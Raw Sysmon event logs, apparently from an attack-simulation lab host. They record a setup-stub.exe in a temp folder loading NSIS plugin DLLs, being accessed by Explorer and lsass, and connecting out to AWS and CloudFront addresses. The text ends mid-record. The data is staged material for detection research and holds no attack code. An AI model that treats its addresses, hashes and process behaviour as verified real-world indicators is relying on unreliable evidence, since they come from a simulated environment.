\ntdll.dll+51791 10341000x800000000000000013900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:43.380{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.380{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:43.380{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.380{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:43.380{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.380{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:43.380{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:43.365{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\WebBrowser.dll2021-01-18 13:59:43.365 10341000x800000000000000013892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.115{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:43.115{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.115{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.115{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:43.115{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:43.037{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\CityHash.dll2021-01-18 13:59:43.037 10341000x800000000000000013886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:43.021{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:43.021{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:43.021{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\UserInfo.dll2021-01-18 13:59:43.021 11241100x800000000000000013883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:43.021{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\UAC.dll2021-01-18 13:59:43.021 11241100x800000000000000013882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:43.005{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\System.dll2021-01-18 13:59:43.005 354300x800000000000000013922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localUsermode2021-01-18 
13:59:43.591{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-495.attackrange.local49201-false18.205.79.132ec2-18-205-79-132.compute-1.amazonaws.com443https 10341000x800000000000000013921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.755{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.755{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.755{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.740{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.740{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:44.599{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeC:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\CertCheck.dll2021-01-18 13:59:44.599 10341000x800000000000000013915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.568{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9450-6005-2305-00000000A301}5656C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.568{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:44.568{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.568{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:44.568{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.568{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9450-6005-2305-00000000A301}5656C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.568{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9450-6005-2305-00000000A301}5656C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:44.568{59A5CD1D-9450-6005-2305-00000000A301}5656C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000013961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localUsermode2021-01-18 13:59:43.883{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-495.attackrange.local49202-false13.224.189.56server-13-224-189-56.fra2.r.cloudfront.net443https 11241100x800000000000000013960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 
